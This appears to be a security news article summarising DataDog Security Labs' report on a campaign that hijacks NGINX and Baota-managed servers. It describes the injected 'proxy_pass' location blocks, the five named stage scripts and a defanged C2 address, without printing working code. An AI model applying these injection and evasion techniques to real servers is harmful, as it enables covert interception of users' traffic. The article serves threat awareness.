In a shocking revelation, hackers are taking control of NGINX servers, redirecting user traffic through their own malicious infrastructure—a tactic that poses significant risks to web security.
NGINX, which stands for Engine X, is an open-source software solution widely used for managing web traffic. It acts as a bridge between users and servers, providing essential functions such as web serving, load balancing, caching, and reverse proxying. Its versatility makes it a popular choice for many websites.
Recently, this alarming campaign was uncovered by experts at DataDog Security Labs. They found that the attackers are specifically targeting NGINX installations and Baota hosting management panels, particularly affecting sites with Asian top-level domains like .in, .id, .pe, .bd, and .th, as well as government and educational institutions that use .edu and .gov domains.
The method employed by these cybercriminals is quite sophisticated. They manipulate existing NGINX configuration files by inserting harmful ‘location’ blocks, which capture incoming requests directed at specific URL paths chosen by the attackers. Once intercepted, these requests are modified to include the complete original URL and then rerouted through the ‘proxy_pass’ directive to domains controlled by the attackers.
Normally, the ‘proxy_pass’ directive is utilized for load balancing, allowing NGINX to distribute requests across various backend server groups to enhance performance and reliability. Because of this legitimate function, any abuse of this method tends to fly under the radar, triggering no security alerts.
To maintain the appearance of legitimacy, the attackers ensure that crucial request headers such as ‘Host,’ ‘X-Real-IP,’ ‘User-Agent,’ and ‘Referer’ are preserved throughout the process. This clever manipulation further complicates detection efforts.
The attack unfolds through a multi-stage scripted toolkit that executes five distinct phases:
- Stage 1 – zx.sh: This initial controller script is responsible for downloading and executing subsequent stages. If tools like curl or wget are unavailable, it has a fallback mechanism that sends raw HTTP requests directly over TCP.
- Stage 2 – bt.sh: This stage targets NGINX configuration files managed via the Baota panel. It dynamically selects templates for injection based on the server_name value, carefully overwrites the configuration, and reloads NGINX to prevent service interruptions.
- Stage 3 – 4zdh.sh: Here, the toolkit scans common NGINX configuration directories such as sites-enabled, conf.d, and sites-available. It employs parsing utilities like csplit and awk to avoid corrupting existing configurations, checking for prior injections through hashing and a global mapping file, and validates changes using the command
nginx -tprior to reloading. - Stage 4 – zdh.sh: This phase narrows its focus mainly on the /etc/nginx/sites-enabled directory, emphasizing .in and .id domains. It follows similar testing protocols and reloading procedures, with a forced restart (using pkill) available as a backup option.
- Stage 5 – ok.sh: The final stage scans the compromised NGINX configurations to compile a map of hijacked domains, injection templates, and proxy targets, sending this gathered data back to a command-and-control (C2) server located at 158.94.210[.]227.
One of the most concerning aspects of these attacks is their stealthy nature. Rather than exploiting vulnerabilities within NGINX itself, the attackers incorporate malicious commands directly into the configuration files. These files often go unchecked, making it difficult for administrators to spot anything amiss. Moreover, since user traffic still reaches its intended destination—often directly—the redirection through the attacker’s infrastructure typically goes unnoticed unless there is rigorous monitoring in place.
As we navigate the rapidly evolving landscape of information technology, staying informed about such threats is crucial. For those interested in enhancing their IT infrastructure, consider exploring modern solutions that can help minimize manual delays and boost efficiency through automation. This may just be the key to maintaining reliable, secure systems in today’s fast-paced digital world.
